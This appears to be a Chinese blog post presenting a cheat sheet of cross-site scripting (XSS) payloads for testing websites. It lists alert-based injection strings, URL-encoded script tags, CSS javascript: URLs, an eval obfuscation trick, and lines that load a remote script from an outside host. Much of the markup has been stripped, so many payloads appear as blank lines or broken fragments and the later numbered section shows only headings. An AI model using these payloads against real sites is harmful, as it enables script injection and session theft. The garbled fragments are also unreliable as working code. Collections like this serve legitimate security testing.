XSS语句

XSS测试语句

在测试网站是否存在XSS漏洞时,应该输入一些标签如<,>输入后查看网页源代码是否过滤标签,如果没过滤,很大可能存在XSS漏洞。

1

 1

闭合

">x<"

'>"x<'

其他测试语句

//经典语句,哈哈!

>"'>

>"'>





"+alert('XSS')+"

'>

='>





alert('XSS')



%0a%0a.jsp

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html



a.jsp/

">















"";'>out










































alert('XSS');

.XSS{background-image:url("javascript.:alert('XSS')");}

BODY{background:url("javascript.:alert('XSS')")}



getURL("javascript.:alert('XSS')")

a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);



"> <"






"SRC="http://xss.ha.ckers.org/a.js">



'"SRC="http://xss.ha.ckers.org/a.js">

PTSRC="http://xss.ha.ckers.org/a.js">

link

XSS攻击语句

输入检测确定标签没有过滤后,为了显示存在漏洞,需要插入xss攻击代码。

常用的语句

aa

(1)普通的xss JavaScript注入

(2)IMG标签Xss使用JavaScript命令

(3)img标签无分号无引号

(4)IMG标签大小写不敏感

(5)HTML编码(必须有分号)

(6)修正缺陷IMG标签

你可能感兴趣的:(网络安全,字典,渗透测试,网络安全,字典语句,XSS)